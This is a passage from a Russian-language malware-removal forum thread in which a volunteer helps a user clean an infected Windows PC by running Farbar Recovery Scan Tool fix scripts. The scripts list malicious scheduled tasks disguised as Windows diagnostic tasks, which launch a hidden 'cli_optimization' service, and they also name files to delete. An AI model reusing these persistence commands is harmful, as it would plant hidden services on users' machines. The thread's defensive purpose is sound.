Task: {373CB9B0-7DB7-413A-BB23-E5B748A1B552} - System32TasksMicrosoftWindowsDiagnosisChkfsScheduled => cmd /c sc start cli_optimization_v2.0.55728_64
Task: {5EBB3703-8909-4397-B72B-C24F55ADDF03} - System32Tasks{A4AADC1C-CD6F-4089-82E1-1D53EAFAE175} => C:Program Files (x86)2gis3.0grym.exe (Нет файла)
Task: {6B7838C7-11B9-4465-85B8-A056F267C0FE} - System32TasksMicrosoftWindowsLocationTelemetry => cmd /c sc start cli_optimization_v2.0.55728_32
Task: {C6237900-D796-4675-9AEA-3CF5C117A31A} - System32TasksMicrosoftWindowsUPnPUPnPHostSearch => cmd /c schtasks /run /TN MicrosoftWindowsRasWinSockets
Task: {DB680ADA-0723-488C-AEA9-0A5946C94286} - System32TasksMicrosoftWindowsIMESQM Data Update => cmd /c sc start cli_optimization_v2.0.56730_32
IPSecPolicy: [ActivePolicy] SOFTWAREPoliciesMicrosoftWindowsIPSECPolicyLocalipsecPolicy{a8fa3862-5da3-4317-b129-5c3a69471ef6} <==== ВНИМАНИЕ (Ограничение - IP)
EmptyTemp:
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 18:49

 [ТС]

17

Цитата
Сообщение от thyrex
Посмотреть сообщение

Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Готово



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 18:55

18

Изменения есть?



0



0 / 0 / 0

Регистрация: 10.02.2023

Сообщений: 24

Вчера, 19:17

 [ТС]

19

Цитата
Сообщение от thyrex
Посмотреть сообщение

Изменения есть?

Вот такие дела, второй снимок — ПО в исключения



0



Вирусоборец

11119 / 6349 / 1316

Регистрация: 06.09.2009

Сообщений: 24,103

Вчера, 19:30

20

Насколько я понял, то все эти инсталляторы от установленной у Вас Taxi-Master, которая использует безнадежно устаревшие Microsoft SQL Server 2005 и PostgreSQL 9.6. Возможно, что и oktell тут тоже замешана. Не исключено, что зараза может проникать именно через их уязвимости.

Написанное ниже выполните в безопасном режиме загрузки.

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Код

Start::
C:WindowsSystem32MsF5E98B78App.dll
C:ProgramDatacm-lock
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.



0



IT_Exp

Эксперт

87844 / 49110 / 22898

Регистрация: 17.06.2006

Сообщений: 92,604

Вчера, 19:30

Помогаю со студенческими работами здесь

После восстановления работает до перезагрузки. После перезагрузки все сначала. Переустановка ОС не помогла.
Такая проблема: после включения ноутбука потребовалось восстановление запуска и системы. После…

Медленный интернет до перезагрузки ноутбука, а после перезагрузки быстрый
Здравствуйте! Есть ноутбук MSI Windows 10, подключен дома к домашнему запароленному wi-fi. Проблема…

После установки иконки антивирус обнаруживает файл
Здравствуйте, подскажите пожалуйста, я экспериментирую с установкой иконок на exe файл, для этого…

После установки античита, Counter-Strike не обнаруживает серверы
играл по сети. установил античипи после того не грузится не один сервак . че делать?

OpenXML после изменения xlsx — Excel обнаруживает ошибки при открытии
Читаю данные из xlsx файла и дописываю к каждой строке генерируемый номер. При открытии Excel…

Флешка получила вирусню, и не записывается нечего
Что делать, флешка поймала вирус или что не пойму, человек дал мне, а она неё не могу нечего…

Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:

20

Понравилась статья? Поделить с друзьями:
  • Style input error
  • Sys stderr write f error exc syntaxerror invalid syntax
  • Stunnel error creating credentials
  • Sys 0012 identification error inpa
  • Syntax error yacc